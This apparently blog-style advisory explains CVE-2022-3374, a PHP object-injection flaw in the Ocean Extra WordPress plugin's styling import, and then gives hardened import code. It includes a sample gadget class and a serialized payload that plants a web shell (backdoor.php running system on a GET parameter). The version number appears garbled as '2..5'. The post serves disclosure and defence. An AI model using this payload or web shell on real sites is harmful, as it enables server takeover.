If you manage or develop WordPress websites, you know how vital plugin security is. Today, we’ll take an exclusive look at CVE-2022-3374, a critical vulnerability that was discovered in the popular Ocean Extra plugin (before version 2..5). This vulnerability can potentially allow attackers to execute arbitrary code on your WordPress site, provided they can trick an admin into importing a malicious file.

What Is Ocean Extra and Why Does It Matter?

Ocean Extra is a companion plugin for the widely used OceanWP WordPress theme. It enhances WordPress site functionality by adding extra widgets, import/export features, and more. As of June 2024, the plugin has over 700,000 active installations, making any vulnerability in it a big deal.

The Short Story

In versions before 2..5, Ocean Extra allows users with high privileges (like admins) to import custom "styling" files via the Customizer tool. The problem? The plugin unserializes the content of these files without proper validation.

Here’s why this is dangerous:
unserialize() in PHP reconstructs objects from arbitrary strings, and magic methods such as __wakeup() and __destruct() run on those objects automatically. If an attacker gets you to import a specially crafted file, and a suitable PHP "gadget chain" exists in your plugin/theme setup, that file could execute code or even fully compromise your website.

In the vulnerable versions, the plugin had a code path similar to this (simplified for explanation):

// In file includes/customizer-styling.php

if ( isset( $_FILES['import_customizer_styling'] ) ) {
    $file_content = file_get_contents( $_FILES['import_customizer_styling']['tmp_name'] );
    $customizer_options = unserialize( $file_content ); // DANGEROUS!
    // ...then process $customizer_options
}

The problem?
If an attacker uploads a file containing malicious serialized PHP objects, those objects are instantiated in the plugin's execution context. Unless there is tight validation (there wasn't), that's game over if a suitable gadget is present.

Attacker Crafts a Malicious File:

The attacker creates a .dat or similar file containing PHP serialized data that, when unserialize() is called, instantiates a dangerous object.

Lure an Admin to Import:

The attacker convinces an admin (or guesses their workflow) to import this file via the customizer styling import tool.

Plugin Loads the File:

The vulnerable code above unserializes the file contents. If your site uses plugins or themes that contain “gadget classes”, the payload gets triggered.

Result:
The attacker can perform actions such as writing files, running commands, or stealing data: whatever the gadget allows.

Suppose you have a vulnerable class (FileWriter) somewhere in your stack:

class FileWriter {
    public $filename;
    public $data;
    // Runs automatically when the object is destroyed, including right after unserialize()
    function __destruct() {
        file_put_contents($this->filename, $this->data);
    }
}

An attacker could create a payload that, when unserialized, writes arbitrary data to a server file:

$a = new FileWriter();
$a->filename = '/var/www/html/backdoor.php';
$a->data = '<?php system($_GET["cmd"]); ?>';
echo serialize($a);

This would produce a string you could save as malicious.dat and upload.
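For comparison, here is how the import path shown earlier can be hardened so that no gadget class is ever instantiated. This is an added example written for this post, not Ocean Extra's own fix; the function names, the size limit and the sample inputs are assumptions made for the illustration.

```php
<?php
// Added example, not Ocean Extra's own code: a hardened version of the import
// path shown above. Function names, the size limit and the sample inputs are
// assumptions made for this illustration.

// Returns the decoded options array, or an error string describing the rejection.
function oe_safe_import_customizer_options( string $file_content ) {
    // 1. A genuine customizer export is small; refuse anything oversized.
    if ( strlen( $file_content ) > 512 * 1024 ) {
        return 'import rejected: file too large';
    }
    // 2. Never let unserialize() instantiate classes. With allowed_classes => false
    //    every "O:" entry becomes __PHP_Incomplete_Class, so no __wakeup()/__destruct()
    //    of a gadget class can run. (Better long-term: export/import JSON instead.)
    $decoded = @unserialize( $file_content, [ 'allowed_classes' => false ] );
    if ( $decoded === false && $file_content !== serialize( false ) ) {
        return 'import rejected: not valid serialized data';
    }
    // 3. Defence in depth: accept only a plain array of scalars/nested arrays, which
    //    also refuses any incomplete-class object that survived step 2.
    if ( ! is_array( $decoded ) || ! oe_is_scalar_tree( $decoded ) ) {
        return 'import rejected: unexpected data type';
    }
    return $decoded;
}

// True if $value is a scalar, null, or an array containing only such values.
function oe_is_scalar_tree( $value ): bool {
    if ( is_array( $value ) ) {
        foreach ( $value as $item ) {
            if ( ! oe_is_scalar_tree( $item ) ) {
                return false;
            }
        }
        return true;
    }
    return is_scalar( $value ) || $value === null;
}

// Constructed sample inputs: a benign options export, and a serialized object of the
// FileWriter gadget class discussed above (harmless here, since it is never instantiated).
$benign  = serialize( [ 'body_font' => 'Roboto', 'header_height' => 80 ] );
$hostile = 'O:10:"FileWriter":2:{s:8:"filename";s:4:"nope";s:4:"data";s:4:"nope";}';

var_dump( oe_safe_import_customizer_options( $benign ) );   // decoded options array
var_dump( oe_safe_import_customizer_options( $hostile ) );  // rejection string, nothing written
```

The same allowed_classes => false guard can be applied anywhere a plugin unserializes data it did not itself generate; a file upload reaching unserialize() without it is the pattern to look for when auditing import features.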

Original References and Further Reading

- Ocean Extra Plugin Page
- CVE-2022-3374 NVD Entry
- Patchstack Advisory
- PHP Object Injection Explained – OWASP

Conclusion

CVE-2022-3374 is a textbook example of why PHP’s unserialize() is so dangerous, especially in CMS plugins with file import features. If you’re running Ocean Extra before 2..5, you should update now to protect your site and your visitors.

Bookmark this page or share it with anyone managing a WordPress website to help keep the web safer!


Do you have questions about this vulnerability or WordPress security in general? Drop them below and let’s discuss.

Timeline

Published on: 10/31/2022 16:15:00 UTC
Last modified on: 11/01/2022 13:50:00 UTC